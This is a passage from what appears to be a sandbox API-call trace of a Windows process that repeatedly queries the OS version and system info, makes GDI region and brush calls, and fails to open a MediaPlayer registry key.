lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.668] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.668] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.668] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.668] BeginPath (hdc=0x0) returned 0 [0087.668] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.668] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.668] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.668] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.668] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.668] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.668] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.669] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6d0401d0 [0087.669] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6f0401cd [0087.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097b [0087.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097c [0087.669] CombineRgn (hrgnDst=0x104097b, hrgnSrc1=0x6d0401d0, hrgnSrc2=0x6f0401cd, iMode=1) returned 1 [0087.669] CombineRgn (hrgnDst=0x104097c, hrgnSrc1=0x6d0401d0, hrgnSrc2=0x6f0401cd, iMode=4) returned 2 [0087.669] CreateSolidBrush (color=0xff) returned 0x210097a [0087.669] CreateSolidBrush (color=0xff0000) returned 0x110097d [0087.669] DeleteObject (ho=0x110097d) returned 1 [0087.669] DeleteObject (ho=0x6f0401cd) returned 1 [0087.669] DeleteObject (ho=0x6d0401d0) returned 1 [0087.669] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.669] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.669] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.669] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.669] BeginPath (hdc=0x0) returned 0 [0087.669] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.669] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.669] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.669] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.669] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.669] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.669] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x700401cd [0087.669] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6e0401d0 [0087.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097e [0087.669] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104097f [0087.669] CombineRgn (hrgnDst=0x104097e, hrgnSrc1=0x700401cd, hrgnSrc2=0x6e0401d0, iMode=1) returned 1 [0087.669] CombineRgn (hrgnDst=0x104097f, hrgnSrc1=0x700401cd, hrgnSrc2=0x6e0401d0, iMode=4) returned 2 [0087.669] CreateSolidBrush (color=0xff) returned 0x210097d [0087.669] CreateSolidBrush (color=0xff0000) returned 0x1100980 [0087.669] DeleteObject (ho=0x1100980) returned 1 [0087.669] DeleteObject (ho=0x6e0401d0) returned 1 [0087.669] DeleteObject (ho=0x700401cd) returned 1 [0087.669] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.669] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.670] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.670] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.670] BeginPath (hdc=0x0) returned 0 [0087.670] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.670] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.670] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.670] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.670] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6f0401d0 [0087.670] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x710401cd [0087.670] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040981 [0087.670] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040982 [0087.670] CombineRgn (hrgnDst=0x1040981, hrgnSrc1=0x6f0401d0, hrgnSrc2=0x710401cd, iMode=1) returned 1 [0087.670] CombineRgn (hrgnDst=0x1040982, hrgnSrc1=0x6f0401d0, hrgnSrc2=0x710401cd, iMode=4) returned 2 [0087.670] CreateSolidBrush (color=0xff) returned 0x2100980 [0087.670] CreateSolidBrush (color=0xff0000) returned 0x1100983 [0087.670] DeleteObject (ho=0x1100983) returned 1 [0087.670] DeleteObject (ho=0x710401cd) returned 1 [0087.670] DeleteObject (ho=0x6f0401d0) returned 1 [0087.670] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.670] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.670] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.670] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.670] BeginPath (hdc=0x0) returned 0 [0087.670] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.670] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.670] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.670] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.670] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.670] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.670] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.671] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x720401cd [0087.671] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x700401d0 [0087.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040984 [0087.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040985 [0087.671] CombineRgn (hrgnDst=0x1040984, hrgnSrc1=0x720401cd, hrgnSrc2=0x700401d0, iMode=1) returned 1 [0087.671] CombineRgn (hrgnDst=0x1040985, hrgnSrc1=0x720401cd, hrgnSrc2=0x700401d0, iMode=4) returned 2 [0087.671] CreateSolidBrush (color=0xff) returned 0x2100983 [0087.671] CreateSolidBrush (color=0xff0000) returned 0x1100986 [0087.671] DeleteObject (ho=0x1100986) returned 1 [0087.671] DeleteObject (ho=0x700401d0) returned 1 [0087.671] DeleteObject (ho=0x720401cd) returned 1 [0087.671] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.671] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.671] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.671] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.671] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.671] BeginPath (hdc=0x0) returned 0 [0087.671] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.671] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.671] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.671] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.671] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.671] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.671] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.671] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.671] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x710401d0 [0087.671] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x730401cd [0087.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040987 [0087.671] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040988 [0087.671] CombineRgn (hrgnDst=0x1040987, hrgnSrc1=0x710401d0, hrgnSrc2=0x730401cd, iMode=1) returned 1 [0087.671] CombineRgn (hrgnDst=0x1040988, hrgnSrc1=0x710401d0, hrgnSrc2=0x730401cd, iMode=4) returned 2 [0087.671] CreateSolidBrush (color=0xff) returned 0x2100986 [0087.671] CreateSolidBrush (color=0xff0000) returned 0x1100989 [0087.671] DeleteObject (ho=0x1100989) returned 1 [0087.671] DeleteObject (ho=0x730401cd) returned 1 [0087.671] DeleteObject (ho=0x710401d0) returned 1 [0087.671] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.671] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.671] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.671] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.671] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.671] BeginPath (hdc=0x0) returned 0 [0087.671] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.672] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.672] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.672] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.672] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.672] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x740401cd [0087.672] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x720401d0 [0087.672] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098a [0087.672] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098b [0087.672] CombineRgn (hrgnDst=0x104098a, hrgnSrc1=0x740401cd, hrgnSrc2=0x720401d0, iMode=1) returned 1 [0087.672] CombineRgn (hrgnDst=0x104098b, hrgnSrc1=0x740401cd, hrgnSrc2=0x720401d0, iMode=4) returned 2 [0087.672] CreateSolidBrush (color=0xff) returned 0x2100989 [0087.672] CreateSolidBrush (color=0xff0000) returned 0x110098c [0087.672] DeleteObject (ho=0x110098c) returned 1 [0087.672] DeleteObject (ho=0x720401d0) returned 1 [0087.672] DeleteObject (ho=0x740401cd) returned 1 [0087.672] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.672] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.672] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.672] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.672] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.672] BeginPath (hdc=0x0) returned 0 [0087.672] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.672] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.672] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.672] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.672] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.672] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x730401d0 [0087.672] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x750401cd [0087.672] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098d [0087.673] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104098e [0087.673] CombineRgn (hrgnDst=0x104098d, hrgnSrc1=0x730401d0, hrgnSrc2=0x750401cd, iMode=1) returned 1 [0087.673] CombineRgn (hrgnDst=0x104098e, hrgnSrc1=0x730401d0, hrgnSrc2=0x750401cd, iMode=4) returned 2 [0087.673] CreateSolidBrush (color=0xff) returned 0x210098c [0087.673] CreateSolidBrush (color=0xff0000) returned 0x110098f [0087.673] DeleteObject (ho=0x110098f) returned 1 [0087.673] DeleteObject (ho=0x750401cd) returned 1 [0087.673] DeleteObject (ho=0x730401d0) returned 1 [0087.673] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.673] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.673] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.673] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.673] BeginPath (hdc=0x0) returned 0 [0087.673] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.673] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.673] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.673] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.673] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.673] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.673] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.673] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x760401cd [0087.673] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x740401d0 [0087.673] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040990 [0087.673] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040991 [0087.673] CombineRgn (hrgnDst=0x1040990, hrgnSrc1=0x760401cd, hrgnSrc2=0x740401d0, iMode=1) returned 1 [0087.673] CombineRgn (hrgnDst=0x1040991, hrgnSrc1=0x760401cd, hrgnSrc2=0x740401d0, iMode=4) returned 2 [0087.673] CreateSolidBrush (color=0xff) returned 0x210098f [0087.673] CreateSolidBrush (color=0xff0000) returned 0x1100992 [0087.673] DeleteObject (ho=0x1100992) returned 1 [0087.673] DeleteObject (ho=0x740401d0) returned 1 [0087.673] DeleteObject (ho=0x760401cd) returned 1 [0087.673] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.673] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.673] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.673] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.673] BeginPath (hdc=0x0) returned 0 [0087.673] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.673] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.673] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.673] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.674] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.674] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.674] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.674] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x750401d0 [0087.674] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x770401cd [0087.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040993 [0087.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040994 [0087.674] CombineRgn (hrgnDst=0x1040993, hrgnSrc1=0x750401d0, hrgnSrc2=0x770401cd, iMode=1) returned 1 [0087.674] CombineRgn (hrgnDst=0x1040994, hrgnSrc1=0x750401d0, hrgnSrc2=0x770401cd, iMode=4) returned 2 [0087.674] CreateSolidBrush (color=0xff) returned 0x2100992 [0087.674] CreateSolidBrush (color=0xff0000) returned 0x1100995 [0087.674] DeleteObject (ho=0x1100995) returned 1 [0087.674] DeleteObject (ho=0x770401cd) returned 1 [0087.674] DeleteObject (ho=0x750401d0) returned 1 [0087.674] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.674] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.674] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.674] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.674] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.674] BeginPath (hdc=0x0) returned 0 [0087.674] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.674] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.674] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 